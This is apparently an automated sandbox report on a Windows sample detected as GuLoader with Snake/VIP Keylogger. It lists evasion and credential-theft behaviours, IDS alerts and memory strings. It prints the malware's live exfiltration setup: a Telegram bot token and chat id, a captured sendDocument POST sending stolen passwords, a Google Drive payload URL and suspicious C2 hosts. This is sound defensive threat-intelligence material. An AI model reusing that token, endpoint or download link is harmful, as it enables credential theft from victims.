Edit tour

Windows Analysis Report
CWu89IbJQw.exe

Overview

General Information

Sample name:	CWu89IbJQw.exe renamed because original name is a hash value
Original sample name:	5640ccd0ee04ad06f40157dfe13ae0ae86ae8c28b03e51fecfa79461afe2f192.exe
Analysis ID:	1632319
MD5:	23f61592f215c6428cbc1d0890dc12be
SHA1:	1acff1da9edf7d59569e90c2ea5b406190f24985
SHA256:	5640ccd0ee04ad06f40157dfe13ae0ae86ae8c28b03e51fecfa79461afe2f192
Tags:	exesignedVIPKeyloggeruser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious PE digital signature

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

CWu89IbJQw.exe (PID: 6772 cmdline: "C:\Users\user\Desktop\CWu89IbJQw.exe" MD5: 23F61592F215C6428CBC1D0890DC12BE)

CWu89IbJQw.exe (PID: 2628 cmdline: "C:\Users\user\Desktop\CWu89IbJQw.exe" MD5: 23F61592F215C6428CBC1D0890DC12BE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg", "Chat id": "744079942"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg", "Chat_id": "744079942", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2517702962.0000000003331000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000C.00000002.3585420008.00000000022C1000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: CWu89IbJQw.exe PID: 2628	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CWu89IbJQw.exe PID: 2628	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:18:04.361584+0100	2803305	3	Unknown Traffic	192.168.2.11	49711	104.21.112.1	443	TCP
2025-03-07T22:18:16.448927+0100	2803305	3	Unknown Traffic	192.168.2.11	49719	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:17:59.511483+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49709	132.226.8.169	80	TCP
2025-03-07T22:18:02.246039+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49709	132.226.8.169	80	TCP
2025-03-07T22:18:05.355242+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49712	132.226.8.169	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:17:52.263107+0100	2803270	2	Potentially Bad Traffic	192.168.2.11	49707	142.250.185.142	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:18:35.483748+0100	1810008	1	Potentially Bad Traffic	192.168.2.11	49727	149.154.167.220	443	TCP
2025-03-07T22:18:39.384390+0100	1810008	1	Potentially Bad Traffic	192.168.2.11	49728	149.154.167.220	443	TCP
2025-03-07T22:18:43.322869+0100	1810008	1	Potentially Bad Traffic	192.168.2.11	49729	149.154.167.220	443	TCP
2025-03-07T22:18:47.327317+0100	1810008	1	Potentially Bad Traffic	192.168.2.11	49730	149.154.167.220	443	TCP
2025-03-07T22:18:51.245886+0100	1810008	1	Potentially Bad Traffic	192.168.2.11	49731	149.154.167.220	443	TCP
2025-03-07T22:18:55.024237+0100	1810008	1	Potentially Bad Traffic	192.168.2.11	49732	149.154.167.220	443	TCP
2025-03-07T22:18:58.910749+0100	1810008	1	Potentially Bad Traffic	192.168.2.11	49733	149.154.167.220	443	TCP
2025-03-07T22:19:04.185987+0100	1810008	1	Potentially Bad Traffic	192.168.2.11	49734	149.154.167.220	443	TCP
2025-03-07T22:19:08.056419+0100	1810008	1	Potentially Bad Traffic	192.168.2.11	49735	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:18:27.900214+0100	1810007	1	Potentially Bad Traffic	192.168.2.11	49726	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5ef2e8206767Host: api.telegram.orgContent-Length: 582

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 21:18:27 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000035119000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: CWu89IbJQw.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: CWu89IbJQw.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000035119000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F8A000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20a
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=7440
Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.0000000035F68000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.0000000035F68000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003503E000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003506F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003503E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000035039000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.00000000046E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.00000000046E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/e
Source: CWu89IbJQw.exe, 0000000C.00000002.3589604649.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XPI1EXGrpy_hlaI5KpuYvokgvS_MVIXw
Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004744000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004745000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.2649662449.000000000474B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004744000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004745000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.2649723666.0000000004784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/0
Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004730000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004722000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004730000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004722000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1XPI1EXGrpy_hlaI5KpuYvokgvS_MVIXw&export=download
Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.0000000035F68000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F8A000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F6A000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034EFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F8A000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F24000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000034F6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.0000000035F68000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: CWu89IbJQw.exe, 0000000C.00000002.3612000584.0000000035F68000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3612000584.00000000361BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: CWu89IbJQw.exe, 0000000C.00000003.2597131412.000000000474B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003506F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003506F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003506A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.11:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.11:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49726 version: TLS 1.2

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040535C

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403348
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		12_2_00403348

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

File created: C:\Windows\Behovsundersgelses

Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 0_2_00406945	0_2_00406945
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 0_2_0040711C	0_2_0040711C
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 0_2_738F1A98	0_2_738F1A98
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_00406945	12_2_00406945
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0040711C	12_2_0040711C
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458C472	12_2_0458C472
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458D548	12_2_0458D548
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458C738	12_2_0458C738
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458C146	12_2_0458C146
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458D278	12_2_0458D278
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_04585370	12_2_04585370
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458CCD8	12_2_0458CCD8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_04589DE0	12_2_04589DE0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_04583E09	12_2_04583E09
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_04586FC8	12_2_04586FC8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458CFAA	12_2_0458CFAA
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458E988	12_2_0458E988
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_045869A0	12_2_045869A0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458CA08	12_2_0458CA08
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458E97A	12_2_0458E97A
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0458F961	12_2_0458F961
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_045829EC	12_2_045829EC
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_04583AA1	12_2_04583AA1
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_04583B95	12_2_04583B95
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0462E7E0	12_2_0462E7E0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0462A6FC	12_2_0462A6FC
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_0462D558	12_2_0462D558
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_04683D70	12_2_04683D70
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_37E91FA8	12_2_37E91FA8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_37E92A90	12_2_37E92A90
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_37E99668	12_2_37E99668
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_37E95148	12_2_37E95148
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_37E9F4D8	12_2_37E9F4D8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_37E91850	12_2_37E91850
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_37E9E7CF	12_2_37E9E7CF
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_37E9E7D0	12_2_37E9E7D0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_37E91FA1	12_2_37E91FA1
